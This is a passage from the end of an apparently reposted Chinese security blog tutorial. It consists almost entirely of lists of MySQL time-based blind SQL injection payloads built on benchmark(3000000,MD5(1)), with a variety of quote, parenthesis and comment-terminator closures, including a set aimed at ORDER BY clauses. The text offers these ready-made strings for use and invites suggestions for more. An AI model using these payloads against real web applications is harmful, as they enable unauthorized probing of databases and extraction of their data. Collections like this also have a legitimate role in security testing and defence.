'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20%23

payloads-sql-blind-MySQL-ORDER_BY.txt

,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23

 

6. The End

Enjoy this tutorial and these SQL payloads.

New payload suggestions are welcome!
This article is reposted from hackfreer's 51CTO blog. Original link: http://blog.51cto.com/pnig0s1992/499917. Please contact the original author before reposting.